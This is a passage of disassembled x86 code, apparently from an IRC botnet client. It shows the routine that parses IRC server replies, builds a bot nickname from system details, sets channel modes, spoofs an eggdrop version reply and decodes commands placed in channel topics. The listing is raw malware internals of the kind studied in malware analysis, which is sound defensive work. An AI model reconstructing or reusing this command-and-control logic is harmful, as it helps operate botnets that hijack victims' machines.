push offset dword_41A12C
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DAEB
loc_40DAAD: ; CODE XREF: sub_40D871+224�j
cmp [ebp+arg_0], 0
jz short loc_40DAD1
push offset dword_41DD08
push 3B7h
push 0
push offset dword_41A108
push [ebp+arg_4]
call sub_40D420
add esp, 14h
jmp short loc_40DAE6
; ---------------------------------------------------------------------------
loc_40DAD1: ; CODE XREF: sub_40D871+240�j
push offset aEggdropV1_6_16 ; "eggdrop v1.6.16"
push offset dword_41A0E8
push [ebp+arg_4]
call sub_40D420
add esp, 0Ch
loc_40DAE6: ; CODE XREF: sub_40D871+25E�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DAEB: ; CODE XREF: sub_40D871+23A�j
push offset dword_41A0E0
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz short loc_40DB16
push offset dword_41A0D8
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call ds:dword_417108 ; lstrcmp
test eax, eax
jnz short loc_40DB2D
loc_40DB16: ; CODE XREF: sub_40D871+28E�j
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
push eax
push [ebp+arg_4]
call sub_40D420
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DB2D: ; CODE XREF: sub_40D871+80�j
; sub_40D871+8D�j ...
push offset a433 ; "433"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DCFD
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_2CC], eax
cmp [ebp+var_2CC], 4
jnb short loc_40DB71
call sub_406AE7
test eax, eax
jz loc_40DCB8
loc_40DB71: ; CODE XREF: sub_40D871+2F1�j
call sub_406A23
lea eax, [ebp+var_390]
push eax
call sub_408342
pop ecx
test eax, eax
jnz short loc_40DB9A
push offset aUnk ; "UNK"
lea eax, [ebp+var_390]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40DB9A: ; CODE XREF: sub_40D871+314�j
call sub_408E8E
cmp eax, 400h
jbe short loc_40DBB3
call sub_408E8E
mov [ebp+var_7E4], eax
jmp short loc_40DBBD
; ---------------------------------------------------------------------------
loc_40DBB3: ; CODE XREF: sub_40D871+333�j
mov [ebp+var_7E4], 400h
loc_40DBBD: ; CODE XREF: sub_40D871+340�j
mov eax, [ebp+var_7E4]
shr eax, 0Ah
mov [ebp+var_36C], eax
call sub_408887
mov [ebp+var_2D0], eax
mov [ebp+var_368], offset aB ; "B"
cmp [ebp+var_2D0], 3E8h
jnb short loc_40DBF7
mov [ebp+var_368], offset aA ; "A"
loc_40DBF7: ; CODE XREF: sub_40D871+37A�j
cmp [ebp+var_2D0], 1F4h
jnb short loc_40DC0D
mov [ebp+var_368], offset aG ; "G"
loc_40DC0D: ; CODE XREF: sub_40D871+390�j
and [ebp+var_370], 0
mov [ebp+var_364], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_360]
rep stosd
lea eax, [ebp+var_364]
push eax
call ds:dword_417030 ; GetVersionExA
cmp [ebp+var_360], 5
jnz short loc_40DC54
cmp [ebp+var_35C], 1
jnz short loc_40DC54
mov [ebp+var_370], 1
loc_40DC54: ; CODE XREF: sub_40D871+3CE�j
; sub_40D871+3D7�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
cmp [ebp+var_370], 0
setz al
dec eax
and eax, 2Fh
add eax, 2Dh
movsx eax, al
push eax
push [ebp+var_368]
push [ebp+var_36C]
push 5Dh
push [ebp+var_2CC]
push 5Bh
push 5Dh
lea eax, [ebp+var_390]
push eax
push 5Bh
push offset aCSCCUCUSCCC ; "%c%s%c%c%u%c%u%s%c%c%c"
lea eax, [ebp+var_2C8]
push eax
call sub_416B5E ; sprintf
add esp, 34h
jmp short loc_40DCE5
; ---------------------------------------------------------------------------
loc_40DCB8: ; CODE XREF: sub_40D871+2FA�j
push offset dword_41DB78
lea eax, [ebp+var_2C8]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_2C8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_2C8]
push eax
call sub_40D7E5
pop ecx
loc_40DCE5: ; CODE XREF: sub_40D871+445�j
lea eax, [ebp+var_2C8]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DCFD: ; CODE XREF: sub_40D871+2D0�j
push offset aError ; "ERROR"
mov eax, [ebp+arg_C]
push dword ptr [eax]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD25
push 0
push 0
push 0
call sub_40D366
add esp, 0Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DD25: ; CODE XREF: sub_40D871+49F�j
push offset aJoin ; "JOIN"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD97
push offset byte_41EF18
push [ebp+arg_4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD97
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jz short loc_40DD97
mov eax, [ebp+arg_C]
mov eax, [eax+8]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_40DD74
mov eax, [ebp+arg_C]
mov eax, [eax+8]
inc eax
mov [ebp+var_7E8], eax
jmp short loc_40DD80
; ---------------------------------------------------------------------------
loc_40DD74: ; CODE XREF: sub_40D871+4F2�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_7E8], eax
loc_40DD80: ; CODE XREF: sub_40D871+501�j
push [ebp+var_7E8]
push offset aModeSSmntu ; "MODE %s +smntu"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DD97: ; CODE XREF: sub_40D871+4C8�j
; sub_40D871+4DB�j ...
push offset a001 ; "001"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DE70
push 21h
mov eax, [ebp+arg_C]
push dword ptr [eax+8]
lea eax, [ebp+var_4B4]
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
lea eax, [ebp+var_4B4]
push eax
push offset byte_41EF18
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_4B4]
push eax
push offset aModeSXi ; "MODE %s +xi"
call sub_40D6CB
pop ecx
pop ecx
push offset dword_41EE18
push offset dword_41DB88
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
lea eax, [ebp+var_490]
push eax
call sub_40CF25
push eax
call sub_40449C
pop ecx
pop ecx
test eax, eax
jz short loc_40DE58
lea eax, [ebp+var_490]
push eax
call sub_4041B7
pop ecx
test eax, eax
jz short loc_40DE43
lea eax, [ebp+var_4B4]
push eax
push offset aUserhostS ; "USERHOST %s"
call sub_40D6CB
pop ecx
pop ecx
jmp short loc_40DE56
; ---------------------------------------------------------------------------
loc_40DE43: ; CODE XREF: sub_40D871+5BB�j
lea eax, [ebp+var_490]
push eax
push offset dword_41F018
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40DE56: ; CODE XREF: sub_40D871+5D0�j
jmp short loc_40DE6B
; ---------------------------------------------------------------------------
loc_40DE58: ; CODE XREF: sub_40D871+5AA�j
lea eax, [ebp+var_4B4]
push eax
push offset aUserhostS ; "USERHOST %s"
call sub_40D6CB
pop ecx
pop ecx
loc_40DE6B: ; CODE XREF: sub_40D871:loc_40DE56�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DE70: ; CODE XREF: sub_40D871+53A�j
push offset a451 ; "451"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DE96
push 0
push 1
call sub_40D043
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DE96: ; CODE XREF: sub_40D871+613�j
push offset a302 ; "302"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DF3E
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jnz short loc_40DEBE
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DEBE: ; CODE XREF: sub_40D871+646�j
push offset a@ ; "@"
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5B8], eax
cmp [ebp+var_5B8], 0
jnz short loc_40DEE4
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DEE4: ; CODE XREF: sub_40D871+66C�j
push 100h
mov eax, [ebp+var_5B8]
inc eax
push eax
push offset dword_41F018
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_5B4]
push eax
mov eax, [ebp+var_5B8]
inc eax
push eax
call sub_404612
pop ecx
pop ecx
movzx eax, al
test eax, eax
jnz short loc_40DF20
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF20: ; CODE XREF: sub_40D871+6A8�j
push 100h
lea eax, [ebp+var_5B4]
push eax
push offset dword_41F018
call sub_407A56
add esp, 0Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF3E: ; CODE XREF: sub_40D871+639�j
push offset aNick ; "NICK"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DF8E
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jnz short loc_40DF62
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF62: ; CODE XREF: sub_40D871+6EA�j
push offset byte_41EF18
push [ebp+arg_4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DF89
mov eax, [ebp+arg_C]
mov eax, [eax+8]
inc eax
push eax
push offset byte_41EF18
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40DF89: ; CODE XREF: sub_40D871+702�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF8E: ; CODE XREF: sub_40D871+6E1�j
push offset a332 ; "332"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E128
mov eax, [ebp+arg_10]
cmp dword ptr [eax+10h], 0
jz short loc_40DFBF
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz short loc_40DFC4
loc_40DFBF: ; CODE XREF: sub_40D871+73E�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DFC4: ; CODE XREF: sub_40D871+74C�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
cmp eax, 3Dh
jnz loc_40E05F
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_5BC], eax
push [ebp+var_5BC]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_5BC], eax
push [ebp+var_5BC]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+arg_10]
cmp dword ptr [eax+14h], 0
jz short loc_40E04E
mov eax, [ebp+arg_10]
push dword ptr [eax+14h]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
mov ecx, [ebp+var_5BC]
lea eax, [eax+ecx+1]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40E05F
; ---------------------------------------------------------------------------
loc_40E04E: ; CODE XREF: sub_40D871+7BB�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
mov ecx, [ebp+var_5BC]
and byte ptr [eax+ecx+1], 0
loc_40E05F: ; CODE XREF: sub_40D871+760�j
; sub_40D871+7DB�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
test eax, eax
jz loc_40E123
lea eax, [ebp+var_7C4]
push eax
push offset asc_41A07C ; "]["
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_7C0], eax
and [ebp+var_7C8], 0
loc_40E09A: ; CODE XREF: sub_40D871+8AD�j
cmp [ebp+var_7C0], 0
jnz short loc_40E0A5
jmp short loc_40E123
; ---------------------------------------------------------------------------
loc_40E0A5: ; CODE XREF: sub_40D871+830�j
; sub_40D871+851�j
mov eax, [ebp+var_7C0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40E0B5
jmp short loc_40E0C4
; ---------------------------------------------------------------------------
loc_40E0B5: ; CODE XREF: sub_40D871+840�j
mov eax, [ebp+var_7C0]
inc eax
mov [ebp+var_7C0], eax
jmp short loc_40E0A5
; ---------------------------------------------------------------------------
loc_40E0C4: ; CODE XREF: sub_40D871+842�j
push [ebp+var_7C0]
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push offset aLinkLink@linkP ; "link!link@link PRIVMSG %s :%s"
push 200h
lea eax, [ebp+var_7BC]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_7BC]
push eax
call sub_40E618
pop ecx
lea eax, [ebp+var_7C4]
push eax
push offset asc_41A07C ; "]["
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_7C8], eax
mov eax, [ebp+var_7C8]
mov [ebp+var_7C0], eax
jmp loc_40E09A
; ---------------------------------------------------------------------------
loc_40E123: ; CODE XREF: sub_40D871+7FA�j
; sub_40D871+832�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E128: ; CODE XREF: sub_40D871+731�j
cmp [ebp+arg_0], 0
jz short loc_40E153
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jz short loc_40E153
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jz short loc_40E153
push offset byte_41EF18
push [ebp+arg_4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E158
loc_40E153: ; CODE XREF: sub_40D871+8BB�j
; sub_40D871+8C4�j ...
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E158: ; CODE XREF: sub_40D871+8E0�j
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_10]
mov [ecx+0Ch], eax
push offset aPrivmsg ; "PRIVMSG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E1C0
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax]
cmp eax, 1
jnz short loc_40E1AB
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
mov [ebp+var_84], 3
jmp short loc_40E1BE
; ---------------------------------------------------------------------------
loc_40E1AB: ; CODE XREF: sub_40D871+923�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_90], eax
and [ebp+var_84], 0
loc_40E1BE: ; CODE XREF: sub_40D871+938�j
jmp short loc_40E216
; ---------------------------------------------------------------------------
loc_40E1C0: ; CODE XREF: sub_40D871+915�j
push offset aNotice ; "NOTICE"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E211
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax]
cmp eax, 1
jnz short loc_40E1F9
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
mov [ebp+var_84], 3
jmp short loc_40E20F
; ---------------------------------------------------------------------------
loc_40E1F9: ; CODE XREF: sub_40D871+971�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_90], eax
mov [ebp+var_84], 1
loc_40E20F: ; CODE XREF: sub_40D871+986�j
jmp short loc_40E216
; ---------------------------------------------------------------------------
loc_40E211: ; CODE XREF: sub_40D871+963�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E216: ; CODE XREF: sub_40D871:loc_40E1BE�j
; sub_40D871:loc_40E20F�j
cmp [ebp+var_84], 3
jnz loc_40E321
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_10]
mov [ecx+0Ch], eax
and [ebp+var_7CC], 0
jmp short loc_40E253
; ---------------------------------------------------------------------------
loc_40E246: ; CODE XREF: sub_40D871:loc_40E31C�j
mov eax, [ebp+var_7CC]
inc eax
mov [ebp+var_7CC], eax
loc_40E253: ; CODE XREF: sub_40D871+9D3�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx+eax*4], 0
jz short loc_40E26B
cmp [ebp+var_7CC], 0Fh
jnz short loc_40E2B8
loc_40E26B: ; CODE XREF: sub_40D871+9EF�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_10]
push dword ptr [ecx+eax*4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_7D4], eax
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D4]
movsx eax, byte ptr [eax+ecx-1]
cmp eax, 1
jnz short loc_40E2B6
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D4]
mov byte ptr [eax+ecx-1], 1
loc_40E2B6: ; CODE XREF: sub_40D871+A2C�j
jmp short loc_40E321
; ---------------------------------------------------------------------------
loc_40E2B8: ; CODE XREF: sub_40D871+9F8�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
push dword ptr [ecx+eax*4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_7D0], eax
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
movsx eax, byte ptr [eax+ecx-1]
cmp eax, 1
jnz short loc_40E31C
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
and byte ptr [eax+ecx-1], 0
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_10]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
and byte ptr [eax+ecx-1], 0
jmp short loc_40E321
; ---------------------------------------------------------------------------
loc_40E31C: ; CODE XREF: sub_40D871+A79�j
jmp loc_40E246
; ---------------------------------------------------------------------------
loc_40E321: ; CODE XREF: sub_40D871+9AC�j
; sub_40D871:loc_40E2B6�j ...
push offset byte_41EF18
push [ebp+var_90]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E340
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
loc_40E340: ; CODE XREF: sub_40D871+AC4�j
push 7Ah
push 0
lea eax, [ebp+var_7C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
mov eax, [eax]
mov [ebp+var_88], eax
and [ebp+var_8C], 0
mov eax, [ebp+arg_10]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_80], eax
loc_40E370: ; CODE XREF: sub_40D871:loc_40E3F2�j
cmp [ebp+var_80], 3
jnb short loc_40E378
jmp short loc_40E3F7
; ---------------------------------------------------------------------------
loc_40E378: ; CODE XREF: sub_40D871+B03�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
cmp eax, 20h
jnz short loc_40E393
mov eax, [ebp+var_80]
dec eax
mov [ebp+var_80], eax
jmp short loc_40E3F2
; ---------------------------------------------------------------------------
loc_40E393: ; CODE XREF: sub_40D871+B17�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-3]
cmp eax, 20h
jnz short loc_40E3F0
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-2]
cmp eax, 2Dh
jnz short loc_40E3F0
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
cmp eax, 7Ah
jg short loc_40E3F0
mov [ebp+var_8C], 1
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
mov [ebp+eax+var_7C], 1
mov eax, [ebp+var_80]
sub eax, 3
mov [ebp+var_80], eax
jmp short loc_40E3F2
; ---------------------------------------------------------------------------
loc_40E3F0: ; CODE XREF: sub_40D871+B32�j
; sub_40D871+B44�j ...
jmp short loc_40E3F7
; ---------------------------------------------------------------------------
loc_40E3F2: ; CODE XREF: sub_40D871+B20�j
; sub_40D871+B7D�j
jmp loc_40E370
; ---------------------------------------------------------------------------
loc_40E3F7: ; CODE XREF: sub_40D871+B05�j
; sub_40D871:loc_40E3F0�j
cmp [ebp+var_8C], 0
jz loc_40E4CC
and [ebp+var_7D8], 0
jmp short loc_40E41A
; ---------------------------------------------------------------------------
loc_40E40D: ; CODE XREF: sub_40D871:loc_40E4C7�j
mov eax, [ebp+var_7D8]
inc eax
mov [ebp+var_7D8], eax
loc_40E41A: ; CODE XREF: sub_40D871+B9A�j
cmp [ebp+var_7D8], 10h
jnb loc_40E4CC
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
cmp dword ptr [ecx+eax*4], 0
jnz short loc_40E43B
jmp loc_40E4CC
; ---------------------------------------------------------------------------
loc_40E43B: ; CODE XREF: sub_40D871+BC3�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
mov ecx, [ebp+var_7D8]
mov edx, [ebp+arg_10]
cmp [edx+ecx*4], eax
jb short loc_40E4C7
cmp [ebp+var_8C], 0
jz short loc_40E48F
cmp [ebp+var_7D8], 0
jz short loc_40E488
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
push dword ptr [ecx+eax*4-4]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_7D8]
mov edx, [ebp+arg_10]
mov ecx, [edx+ecx*4-4]
and byte ptr [ecx+eax], 0
loc_40E488: ; CODE XREF: sub_40D871+BF1�j
and [ebp+var_8C], 0
loc_40E48F: ; CODE XREF: sub_40D871+BE8�j
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
mov eax, [ecx+eax*4]
and byte ptr [eax], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
and byte ptr [eax], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
and dword ptr [ecx+eax*4], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
and dword ptr [ecx+eax*4], 0
loc_40E4C7: ; CODE XREF: sub_40D871+BDF�j
jmp loc_40E40D
; ---------------------------------------------------------------------------
loc_40E4CC: ; CODE XREF: sub_40D871+B8D�j
; sub_40D871+BB0�j ...
push offset byte_41EF18
mov eax, [ebp+arg_C]
push dword ptr [eax+8]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E513
mov eax, [ebp+arg_10]
add eax, 0Ch
push eax
mov eax, [ebp+arg_C]
add eax, 0Ch
push eax
lea eax, [ebp+var_7C]
push eax
push [ebp+var_84]
push [ebp+var_90]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40A9CF
add esp, 1Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E513: ; CODE XREF: sub_40D871+C6F�j
mov eax, [ebp+arg_C]
cmp dword ptr [eax+10h], 0
jnz short loc_40E521
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E521: ; CODE XREF: sub_40D871+CA9�j
and [ebp+var_7DC], 0
push offset asc_41A070 ; "*"
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E54A
mov [ebp+var_7DC], 1
jmp loc_40E5DE
; ---------------------------------------------------------------------------
loc_40E54A: ; CODE XREF: sub_40D871+CCB�j
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push offset byte_41EF18
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40E56C
mov [ebp+var_7DC], 1
jmp short loc_40E5DE
; ---------------------------------------------------------------------------
loc_40E56C: ; CODE XREF: sub_40D871+CF0�j
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
cmp eax, 4
ja short loc_40E5DE
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+0Ch]
movsx eax, byte ptr [ecx+eax-1]
cmp eax, 25h
jnz short loc_40E5DE
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+0Ch]
and byte ptr [ecx+eax-1], 0
call sub_410422
xor edx, edx
push 64h
pop ecx
div ecx
inc edx
mov [ebp+var_7E0], edx
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B9C ; atoi
pop ecx
cmp eax, [ebp+var_7E0]
jl short loc_40E5DE
mov [ebp+var_7DC], 1
loc_40E5DE: ; CODE XREF: sub_40D871+CD4�j
; sub_40D871+CF9�j ...
movzx eax, [ebp+var_7DC]
test eax, eax
jz short loc_40E615
mov eax, [ebp+arg_10]
add eax, 10h
push eax
mov eax, [ebp+arg_C]
add eax, 10h
push eax
lea eax, [ebp+var_7C]
push eax
push [ebp+var_84]
push [ebp+var_90]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40A9CF
add esp, 1Ch
loc_40E615: ; CODE XREF: sub_40D871+31�j
; sub_40D871+4C�j ...
pop edi
leave
retn
sub_40D871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E618 proc near ; CODE XREF: sub_40C93C+A8�p
; sub_40D871+87F�p ...
var_1194 = dword ptr -1194h
var_1190 = dword ptr -1190h
var_118C = byte ptr -118Ch
var_1180 = dword ptr -1180h
var_114C = dword ptr -114Ch
var_1148 = dword ptr -1148h
var_1144 = dword ptr -1144h
var_113C = dword ptr -113Ch
var_1138 = dword ptr -1138h
var_1109 = byte ptr -1109h
var_1108 = byte ptr -1108h
var_1089 = byte ptr -1089h
var_1088 = byte ptr -1088h
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1194h
call sub_416BC0
and [ebp+var_4], 0
push 10h
lea eax, [ebp+var_118C]
push eax
lea eax, [ebp+var_1148]
push eax
lea eax, [ebp+var_1088]
push eax
push [ebp+arg_0]
call sub_407928
add esp, 14h
push offset a302 ; "302"
push [ebp+var_1144]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E66D
mov ds:dword_41EA7C, 1
jmp short loc_40E674
; ---------------------------------------------------------------------------
loc_40E66D: ; CODE XREF: sub_40E618+47�j
and ds:dword_41EA7C, 0
loc_40E674: ; CODE XREF: sub_40E618+53�j
cmp [ebp+var_1148], 0
jz short loc_40E686
cmp [ebp+var_1144], 0
jnz short loc_40E68B
loc_40E686: ; CODE XREF: sub_40E618+63�j
jmp locret_40E941
; ---------------------------------------------------------------------------
loc_40E68B: ; CODE XREF: sub_40E618+6C�j
push offset aPrivmsg ; "PRIVMSG"
push [ebp+var_1144]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz short loc_40E6BB
push offset aNotice ; "NOTICE"
push [ebp+var_1144]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40E7A5
loc_40E6BB: ; CODE XREF: sub_40E618+87�j
cmp [ebp+var_113C], 0
jz loc_40E7A5
cmp [ebp+var_1138], 0
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax+1]
cmp eax, 3Dh
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax+2]
test eax, eax
jz loc_40E7A5
mov eax, [ebp+var_113C]
inc eax
inc eax
push eax
call sub_40EC96
pop ecx
test eax, eax
jz loc_40E7A5
mov eax, [ebp+var_113C]
inc eax
push eax
mov eax, [ebp+var_113C]
inc eax
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_1190], eax
push [ebp+var_1190]
mov eax, [ebp+var_113C]
inc eax
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_1190], eax
push [ebp+var_1190]
mov eax, [ebp+var_113C]
inc eax
push eax
call sub_40EF41
pop ecx
